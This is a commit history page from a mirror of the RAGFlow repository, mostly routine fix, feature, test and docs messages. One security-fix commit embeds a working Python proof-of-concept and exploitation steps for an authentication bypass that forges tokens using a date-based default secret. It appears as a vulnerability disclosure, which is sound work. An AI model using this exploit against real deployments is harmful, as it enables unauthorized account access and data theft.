ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2026-01-23 03:26:53 +08:00

Author	SHA1	Message	Date
yurhett	9c6c6c51e0	Fix: use jwks_uri from OIDC metadata for JWKS client (#8136 ) ### What problem does this PR solve? Issue: #8051 The current implementation assumes JWKS endpoints follow the standard `/.well-known/jwks.json` convention. This breaks authentication for OIDC providers that use non-standard JWKS paths, resulting in 404 errors during token validation. Root Cause Analysis - The OpenID Connect specification doesn't mandate a fixed path for JWKS endpoints - Some identity providers (like certain Keycloak configurations) use custom endpoints - Our previous approach constructed JWKS URLs by convention rather than discovery ### Solution Approach Instead of constructing JWKS URLs by appending to the issuer URI, we now: 1. Properly leverage the `jwks_uri` from the OIDC discovery metadata 2. Honor the identity provider's actual configured endpoint ```python # Before (fragile approach) jwks_url = f"{self.issuer}/.well-known/jwks.json" # After (standards-compliant) jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:58 +08:00
HaiyangP	baf32ee461	Display only the duplicate column names and corresponding original source. (#8138 ) ### What problem does this PR solve? This PR aims to slove #8120 which request a better error display of duplicate column names. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:38 +08:00
balibabu	8fb6b5d945	Feat: Add agent operator node from agent form #3221 (#8144 ) ### What problem does this PR solve? Feat: Add agent operator node from agent form #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-09 19:19:48 +08:00
Liu An	5cc2eda362	Test: Refactor test fixtures and add SDK session management tests (#8141 ) ### What problem does this PR solve? - Consolidate HTTP API test fixtures using batch operations (batch_add_chunks, batch_create_chat_assistants) - Fix fixture initialization order in clear_session_with_chat_assistants - Add new SDK API test suite for session management (create/delete/list/update) ### Type of change - [x] Add test cases - [x] Refactoring	2025-06-09 18:13:26 +08:00
balibabu	9a69d5f367	Feat: Display chat content on the agent page #3221 (#8140 ) ### What problem does this PR solve? Feat: Display chat content on the agent page #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-09 18:13:06 +08:00
balibabu	d9b98cbb18	Feat: Convert the prompt field of the agent operator to an array #3221 (#8137 ) ### What problem does this PR solve? Feat: Convert the prompt field of the agent operator to an array #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-09 16:02:33 +08:00
Kevin Hu	24625e0695	Fix: presentation of PDF using vlm. (#8133 ) ### What problem does this PR solve? #8109 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-09 15:01:52 +08:00
Liu An	4649accd54	Test: Add SDK API tests for chat assistant management and improve con… (#8131 ) ### What problem does this PR solve? - Implement new SDK API test cases for chat assistant CRUD operations - Enhance HTTP API concurrent tests to use as_completed for better reliability ### Type of change - [x] Add test cases - [x] Refactoring	2025-06-09 13:30:12 +08:00
Liu An	968ffc7ef3	Refa: dataset operations to simplify error handling (#8132 ) ### What problem does this PR solve? - Consolidate database operations within single try-except blocks in the methods ### Type of change - [x] Refactoring	2025-06-09 13:29:56 +08:00
Stephen Hu	2337bbf6ca	Perf: pass useless check for tidy graph (#8121 ) ### What problem does this PR solve? Support passing the attribute check when the upstream has already made sure it. ### Type of change - [X] Performance Improvement	2025-06-09 11:44:13 +08:00
Liu An	ad1f89fea0	Fix: chat module update LLM defaults (#8125 ) ### What problem does this PR solve? Previously when LLM.model_name was not configured: - System incorrectly defaulted to 'deepseek-chat' model - This caused permission errors for unauthorized tenants Now: - Use tenant's default chat_model configuration first ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-09 11:44:02 +08:00
Liu An	2ff911b08c	Fix: Set default rerank_model to empty string in Chat class (#8130 ) ### What problem does this PR solve? Previously when LLM.rerank_model was not configured: - SDK would pass None as the value - Database field with null=False constraint would reject it - Caused storage failures for unset rerank_model cases Now: - SDK checks for None value before database operations - Provides empty string as default when rerank_model is unset ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-09 11:43:42 +08:00
Zhichang Yu	1ed0b25910	Fix task_limiter in raptor.py (#8124 ) ### What problem does this PR solve? Fix task_limiter in raptor.py ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-09 10:18:03 +08:00
Liu An	5825a24d26	Test: Refactor test concurrency handling and add SDK chunk management tests (#8112 ) ### What problem does this PR solve? - Improve concurrent test cases by using as_completed for better reliability - Rename variables for clarity (chunk_num -> count) - Add new SDK API test suite for chunk management operations - Update HTTP API tests with consistent concurrency patterns ### Type of change - [x] Add test cases - [x] Refactoring	2025-06-06 19:43:14 +08:00
writinwaters	157cd8b1b0	Docs: Added auto-keyword auto-question guide (#8113 ) ### What problem does this PR solve? ### Type of change - [x] Documentation Update	2025-06-06 19:27:41 +08:00
balibabu	06463135ef	Feat: Reference the output variable of the upstream operator #3221 (#8111 ) ### What problem does this PR solve? Feat: Reference the output variable of the upstream operator #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-06 19:27:29 +08:00
Kevin Hu	7ed9efcd4e	Fix: QWenCV issue. (#8106 ) ### What problem does this PR solve? Close #8097 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-06 17:55:13 +08:00
balibabu	0bc1f45634	Feat: Enables the message operator form to reference the data defined by the begin operator #3221 (#8108 ) ### What problem does this PR solve? Feat: Enables the message operator form to reference the data defined by the begin operator #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-06 17:54:59 +08:00
balibabu	1885a4a4b8	Feat: Receive reply messages of different event types from the agent #3221 (#8100 ) ### What problem does this PR solve? Feat: Receive reply messages of different event types from the agent #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-06 16:30:18 +08:00
Wanderson Pinto dos Santos	0e03542db5	fix: single task executor getting all tasks from Redis queue (#7330 ) ### What problem does this PR solve? Currently, as long as there are tasks in Redis, this loop will keep getting the tasks. This will lead to a single task executor with many tasks in the pending state. Then we need to wait for the pending tasks to get them back in the queue. In first place, if we set the `MAX_CONCURRENT_TASKS` to X, then only X tasks should be picked from the queue, and others should be left in the queue for other `task_executors` or be picked after 1 of the spots in the current executor gets free. This PR ensures this behavior. The additional changes were due to the Ruff linting in pre-commit. But I believe these are expected to keep the coding style. ### Type of change - [X] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>	2025-06-06 14:32:35 +08:00
Stephen Hu	2e44c3b743	Fix:Unimplemented function in ppt_parser (#8095 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8088 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-06 10:05:58 +08:00
writinwaters	d1ff588d46	Docs: Updated server launching code (#8093 ) ### What problem does this PR solve? _Briefly describe what this PR aims to solve. Include background context that will help reviewers understand the purpose of the PR._ ### Type of change - [x] Documentation Update	2025-06-06 09:48:18 +08:00
Liu An	cc1b2c8f09	Test: add sdk Document test cases (#8094 ) ### What problem does this PR solve? Add sdk document test cases ### Type of change - [x] Add test cases	2025-06-06 09:47:06 +08:00
Liu An	100ea574a7	Fix(python-sdk): Add name filtering support to Dataset.list_documents() (#8090 ) ### What problem does this PR solve? Added name filtering capability for Dataset.list_documents() ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 19:04:35 +08:00
Liu An	92625e1ca9	Fix: document typo in test (#8091 ) ### What problem does this PR solve? fix document typo in test ### Type of change - [x] Typo	2025-06-05 19:03:46 +08:00
Liu An	f007c1c772	Fix: Resolve JSON download errors in Document.download() (#8084 ) ### What problem does this PR solve? An exception is thrown only when the json file has only two keys, `code` and `message`. In other cases, response.content is returned normally. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 18:03:51 +08:00
balibabu	841291dda0	Fix: Fixed an issue where using the new quote markers would cause dialogue output to have delete symbols #7623 (#8083 ) ### What problem does this PR solve? Fix: Fixed an issue where using the new quote markers would cause dialogue output to have delete symbols #7623 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 17:43:28 +08:00
balibabu	6488f22540	Feat: Convert the inputs parameter of the begin operator #3221 (#8081 ) ### What problem does this PR solve? Feat: Convert the inputs parameter of the begin operator #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 16:29:48 +08:00
Stephen Hu	6953ae89c4	Fix:when stream=false，new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
balibabu	7c7359a9b2	Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 (#8080 ) ### What problem does this PR solve? Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 15:12:21 +08:00
Liu An	ee52000870	Test: add sdk Dataset test cases (#8077 ) ### What problem does this PR solve? Add sdk dataset test cases ### Type of change - [x] Add test case	2025-06-05 13:20:28 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in a assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Stephen Hu	640fca7dc9	Fix: set output for Message template (#8064 ) ### What problem does this PR solve? now Streamning logic is not match with none streaming logic, which may introduce down stream can not find upstream components. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:10:40 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
Stephen Hu	f819378fb0	Update api_utils.py (#8069 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486 lazy throw exception to better support custom embedding model ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:05:58 +08:00
balibabu	c163b799d2	Feat: Create empty agent #3221 (#8054 ) ### What problem does this PR solve? Feat: Create empty agent #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 12:04:31 +08:00
Liu An	4f3abb855a	Fix: remove zhipu ai api key (#8066 ) ### What problem does this PR solve? - Removed hardcoded Zhipu API key from codebase - New requirement: Tests now require ZHIPU_AI_API_KEY environment variable Example: export ZHIPU_AI_API_KEY=your_api_key_here ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:04:09 +08:00
Mathias Panzenböck	a374816fb2	Don't use '，' (U+FF0C) but ', ' (U+2C U+20) (#8063 ) The Unicode codepoint '，' (U+FF0C) is meant to be used in Chinese text, but this is English text. It looks like a comma followed by a space, but isn't. Of course I didn't change actual Chinese text. ### What problem does this PR solve? Mixup of Unicode characters. This is probably unnoticed by most users, but I wonder if screen readers would read it out differently or if LLMs would trip up on it. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [x] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-06-05 09:29:07 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
Kevin Hu	ec60b322ab	Fix: data missing after upgrading. (#8047 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 16:25:34 +08:00
balibabu	8445143359	Feat: Add RunSheet component #3221 (#8045 ) ### What problem does this PR solve? Feat: Add RunSheet component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 15:56:47 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Liu An	73f9c226d3	Fix: Allow None value for parser_config in create_dataset SDK method (#8041 ) ### What problem does this PR solve? Fix parser_config=None handling in create_dataset ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 13:16:32 +08:00
Liu An	52c814b89d	Refa: Move HTTP API tests to top-level test directory (#8042 ) ### What problem does this PR solve? Move test cases only - CI still runs tests under sdk/python ### Type of change - [x] Refactoring	2025-06-04 13:16:17 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
writinwaters	7b268eb134	Docs: Miscellaneous UI updates (#8031 ) ### What problem does this PR solve? ### Type of change - [x] Documentation Update	2025-06-04 09:31:41 +08:00
Adrian Altermatt	31d2b3cb5a	Fix: Grammar and clarity improvements in prompt templates (#8023 ) ## Summary Fixed grammar errors and improved clarity in prompt templates throughout `rag/prompts.py`. ## Changes Made - Fixed incomplete sentence: `"If the user's latest question is completely, don't do anything"` → `"If the user's latest question is already complete, don't do anything"` - Improved phrasing: `"of like [ID:i]"` → `"such as [ID:i]"` - Added missing articles: `"give top 3"` → `"give the top 3"` - Fixed prepositions: `"in language of"` → `"in the same language as"` - Corrected spelling: `"Jappanese"` → `"Japanese"` - Standardized formatting: Consistent role descriptions and punctuation ## Impact These changes improve prompt readability and should make instructions clearer for the underlying language models. ## Test Plan - [x] Verified changes maintain original prompt functionality - [x] No breaking changes to prompt structure or expected outputs Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>	2025-06-03 19:41:59 +08:00
balibabu	ef899a8859	Feat: Add DynamicPrompt component #3221 (#8028 ) ### What problem does this PR solve? Feat: Add DynamicPrompt component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 19:41:35 +08:00
balibabu	e47186cc42	Feat: Add AgentNode component #3221 (#8019 ) ### What problem does this PR solve? Feat: Add AgentNode component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 17:42:30 +08:00

1 2 3 4 5 ...

3146 Commits